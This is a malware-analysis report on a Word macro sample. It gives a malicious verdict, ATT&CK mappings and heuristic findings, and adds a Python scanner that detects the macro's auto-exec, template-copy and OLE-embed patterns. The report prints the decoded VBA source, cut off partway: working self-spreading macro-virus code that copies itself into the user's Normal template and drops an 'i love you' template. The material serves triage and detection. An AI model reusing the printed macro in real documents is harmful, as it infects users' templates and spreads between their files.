Verdict: MALICIOUS (Risk Score: 200)
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
- T1204.002 User Execution: Malicious File
The sample carries VBA macros with two auto-execution entry points, autoopen and autoclose, so its code runs when the document is opened and again when it is closed. The CreateObject call only instantiates a Scripting.FileSystemObject to resolve the Windows, System and Temp folders; it is not what embeds the OLE object. Persistence comes from Application.OrganizerCopy with wdOrganizerObjectProjectItems, which copies the macro module named "ily" from the opened document into NormalTemplate, the user's global template, so documents created or opened afterwards inherit the macro. autoopen then embeds an OLE Package object through Selection.InlineShapes.AddOLEObject that points at "i love you.exe" in the Windows folder (getspecialfolder(0)), saves a copy of the document as the template "i love you.dot" in that same folder, and reopens the original; autoclose opens that template, copies its content into the document being closed and saves it. Two caveats for triage: the macro does not create or download "i love you.exe" (with LinkToFile:=False the embed only succeeds if the file already exists on the host, and the On Error handler lets the routine continue if it does not), and the legacy WordBasic auto-execution marker is corroborating evidence of the same auto-exec surface rather than an independent indicator; its generic description below says no modern VBA project was recovered, but olevba did decode the source here, which is listed under extracted artifacts.
Heuristics (6)
- VBA macros detected (medium; 4 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code
- AutoOpen macro (high) [OLE_VBA_AUTOOPEN]: AutoOpen macro
- Auto_Close macro (high) [OLE_VBA_AUTOCLOSE]: Auto_Close macro
- CreateObject call (high) [OLE_VBA_CREATEOBJ]: CreateObject call
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5068 bytes | 027e69ea7daf87f7834027aba3f9ae13cf79dd1907c9b8d219e7ad9d8cb5b4c8 |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "ily"
Public biaosi As String
Public danqian As String
Public biaosi1 As String
Sub autoopen()
Dim fso, dirwin, dirsystem, dirtemp, winnormal
Set fso = CreateObject("scripting.filesystemobject")
Set dirwin = fso.getspecialfolder(0)
Set dirsystem = fso.getspecialfolder(1)
Set dirtemp = fso.getspecialfolder(2)
'winnormal = Left$(dirtemp, (Len(dirtemp) - 13)) + "Application Data\Microsoft\Templates"
biaosi = ActiveDocument.Name
If biaosi <> "i love you.dot" Then
danqian = ActiveDocument.Path + "\" + ActiveDocument.Name
On Error GoTo mathhandler
Application.OrganizerCopy Source:= _
danqian, Destination _
:= _
NormalTemplate.FullName _
, Name:="ily", Object:=wdOrganizerObjectProjectItems
Selection.InlineShapes.AddOLEObject ClassType:="Package", FileName:= _
dirwin & "\i love you.exe", LinkToFile:=False, DisplayAsIcon:=False
If misflag <> 1 Then
Selection.MoveLeft Unit:=wdCharacter, Count:=1, Extend:=wdExtend
Selection.Cut
Selection.WholeStory
Selection.Delete Unit:=wdCharacter, Count:=1
Selection.Paste
ActiveDocument.SaveAs FileName:=dirwin & "\i love you.dot", FileFormat:=wdFormatTemplate _
, LockComments:=False, Password:="", AddToRecentFiles:=True, _
WritePassword:="", ReadOnlyRecommended:=False, EmbedTrueTypeFonts:=False, _
SaveNativePictureFormat:=False, SaveFormsData:=False, SaveAsAOCELetter:= _
False
Documents.Open FileName:=danqian, ConfirmConversions:=True, _
ReadOnly:=False, AddToRecentFiles:=False, PasswordDocument:="", _
PasswordTemplate:="", Revert:=False, WritePasswordDocument:="", _
WritePasswordTemplate:="", Format:=wdOpenFormatAuto
'Documents("C:\winnt\i love you.dot").Save
Windows("i love you.dot").Close
flag1 = 1
Else
End If
If flag1 <> 1 Then
Documents.Open FileName:=dirwin & "\i love you.dot", ConfirmConversions:=True, _
ReadOnly:=False, AddToRecentFiles:=False, PasswordDocument:="", _
PasswordTemplate:="", Revert:=False, WritePasswordDocument:="", _
WritePasswordTemplate:="", Format:=wdOpenFormatAuto
Application.OrganizerCopy Source:= _
dirwin & "\i love you.dot" _
, Destination:=danqian _
, Name:="ily", Object:=wdOrganizerObjectProjectItems
Selection.MoveRight Unit:=wdCharacter, Count:=1, Extend:=wdExtend
Selection.Copy
'Documents("C:\winnt\i love you.dot").Save
Windows("i love you.dot").Close
Selection.Paste
ActiveDocument.Save
Application.WindowState = wdWindowStateNormal
Else
End If
mathhandler:
misflag = 1
Resume Next
Else
End If
End Sub
Sub autoclose()
Dim fso, dirwin, dirsystem, dirtemp, winnormal
Set fso = CreateObject("scripting.filesystemobject")
Set dirwin = fso.getspecialfolder(0)
Set dirsystem = fso.getspecialfolder(1)
Set dirtemp = fso.getspecialfolder(2)
winnormal = Left$(dirtemp, (Len(dirtemp) - 13)) + "Application Data\Microsoft\Templates"
On Error GoTo mathhandler2
biaosi1 = ActiveDocument.Name
If biaosi1 <> "i love you.dot" Then
Documents.Open FileName:=dirwin & "\i love you.dot", ConfirmConversions:=True, _
ReadOnly:=False, AddToRecentFiles:=False, PasswordDocument:="", _
PasswordTemplate:="", Revert:=False, WritePasswordDocument:="", _
WritePasswordTemplate:="", Format:=wdOpenFormatAuto
Selection.MoveRight Unit:=wdCharacter, Count:=1, Extend:=wdExtend
Selection.Copy
Windows("i love you.dot").Close
Documents(biaosi1).Activate
With ActiveDocument
Selection.HomeKey Unit:=wdStory
Selection.Paste
Selection.EndKey Unit:=wdStory
Selection.Paste
End With
ActiveDocument.Save
Application.WindowState = wdWindowStateNormal
Else
... (truncated)
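As an added example, not part of the analyzer's output or of the sample, the following Python scanner applies the heuristics listed under Heuristics to decoded VBA source such as the macros.bas preview above. It joins " _" line continuations, strips comments with awareness of string literals, matches auto-exec entry points case-insensitively (the sample spells them autoopen and autoclose), flags the CreateObject call, the OrganizerCopy into NormalTemplate, the Package OLE embed and the SaveAs to a template, and pulls out the file names the macro references so they can be hunted on hosts. The ids OLE_VBA_AUTOOPEN, OLE_VBA_AUTOCLOSE, OLE_VBA_CREATEOBJ and OLE_VBA_PCODE_AUTOEXEC_EXEC come from the report; VBA_NORMAL_TEMPLATE_COPY, VBA_PACKAGE_OLE_EMBED, VBA_SAVEAS_TEMPLATE and VBA_EXEC_TOKEN are invented for this example, and SAMPLE_VBA is a constructed excerpt of the preview, trimmed to the statements the rules key on.

```python
import re
from collections import namedtuple

# Constructed excerpt of the decoded macros.bas shown above; the real artifact is longer.
SAMPLE_VBA = r'''Attribute VB_Name = "ily"
Sub autoopen()
Set fso = CreateObject("scripting.filesystemobject")
Set dirwin = fso.getspecialfolder(0)
danqian = ActiveDocument.Path + "\" + ActiveDocument.Name
Application.OrganizerCopy Source:= _
danqian, Destination _
:= _
NormalTemplate.FullName _
, Name:="ily", Object:=wdOrganizerObjectProjectItems
Selection.InlineShapes.AddOLEObject ClassType:="Package", FileName:= _
dirwin & "\i love you.exe", LinkToFile:=False, DisplayAsIcon:=False
ActiveDocument.SaveAs FileName:=dirwin & "\i love you.dot", FileFormat:=wdFormatTemplate _
, LockComments:=False, Password:=""
'Documents("C:\winnt\i love you.dot").Save
End Sub
Sub autoclose()
ActiveDocument.Save
End Sub
'''

Finding = namedtuple("Finding", "id severity evidence")
# OLE_VBA_* ids mirror the report; the VBA_* ids are invented for this example.
AUTOEXEC_SUBS = {"autoopen": "OLE_VBA_AUTOOPEN", "auto_open": "OLE_VBA_AUTOOPEN",
                 "document_open": "OLE_VBA_AUTOOPEN", "autoclose": "OLE_VBA_AUTOCLOSE",
                 "auto_close": "OLE_VBA_AUTOCLOSE", "document_close": "OLE_VBA_AUTOCLOSE"}
TOKEN_RULES = [  # (regex over one logical line, finding id, severity)
    (r"\bCreateObject\s*\(", "OLE_VBA_CREATEOBJ", "high"),
    (r"\bOrganizerCopy\b.*\bNormalTemplate\b", "VBA_NORMAL_TEMPLATE_COPY", "high"),
    (r'\bAddOLEObject\b.*ClassType:=\s*"Package"', "VBA_PACKAGE_OLE_EMBED", "high"),
    (r"\bSaveAs\b.*\bwdFormatTemplate\b", "VBA_SAVEAS_TEMPLATE", "medium"),
    (r"\b(?:Shell|ShellExecute|URLDownloadToFile)\b", "VBA_EXEC_TOKEN", "high"),
]
EXEC_IDS = {"OLE_VBA_CREATEOBJ", "VBA_NORMAL_TEMPLATE_COPY",
            "VBA_PACKAGE_OLE_EMBED", "VBA_EXEC_TOKEN"}
DROP_EXT = re.compile(r"\.(?:exe|dll|scr|dot|dotm|docm|vbs|js|bat|cmd|ps1)$", re.I)

def strip_comment(line):
    # Drop a trailing ' comment, ignoring apostrophes inside string literals,
    # so commented-out code (the sample has several such lines) is not scored.
    in_str = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_str = not in_str
        elif ch == "'" and not in_str:
            return line[:i].rstrip()
    return line

def logical_lines(src):
    # Join " _" continuations: VBA statements may span lines, and the sample
    # spreads its OrganizerCopy call over five of them.
    out, buf = [], []
    for raw in src.splitlines():
        line = strip_comment(raw.rstrip())
        if line.endswith(" _"):
            buf.append(line[:-2].rstrip())
            continue
        buf.append(line)
        joined = " ".join(p for p in buf if p).strip()
        buf = []
        if joined:
            out.append(joined)
    return out

def scan_vba(src):
    # VBA identifiers are case-insensitive: "autoopen" must hit the same rule
    # as "AutoOpen", which a case-sensitive grep for the latter would miss.
    findings = []
    for line in logical_lines(src):
        m = re.match(r"(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)", line, re.I)
        if m and m.group(1).lower() in AUTOEXEC_SUBS:
            findings.append(Finding(AUTOEXEC_SUBS[m.group(1).lower()], "high", line))
        for pat, fid, sev in TOKEN_RULES:
            if re.search(pat, line, re.I):
                findings.append(Finding(fid, sev, line))
    return findings

def autoexec_with_exec_tokens(findings):
    # Source-level analogue of OLE_VBA_PCODE_AUTOEXEC_EXEC: an auto-exec entry
    # point plus at least one object-creation or execution token.
    ids = {f.id for f in findings}
    return any(i.startswith("OLE_VBA_AUTO") for i in ids) and bool(ids & EXEC_IDS)

def dropped_artifacts(src):
    # String literals naming executables or templates: host IOCs to hunt for.
    # The sample joins them to fso.getspecialfolder(0), i.e. the Windows folder.
    names = set()
    for line in logical_lines(src):
        for lit in re.findall(r'"([^"]*)"', line):
            if DROP_EXT.search(lit):
                names.add(lit.rsplit("\\", 1)[-1].lower())
    return names

if __name__ == "__main__":
    for f in scan_vba(SAMPLE_VBA):
        print(f"{f.severity:6} {f.id:24} {f.evidence[:60]}")
    print("dropped:", sorted(dropped_artifacts(SAMPLE_VBA)))
```

On the excerpt this reports both auto-exec entry points, the CreateObject call, the Normal-template copy, the Package embed and the template SaveAs, and lists "i love you.exe" and "i love you.dot" as names to check under the Windows folder. Matching on joined logical lines is the part that matters for this sample: a line-by-line grep for OrganizerCopy next to NormalTemplate misses it, because the two tokens sit three lines apart.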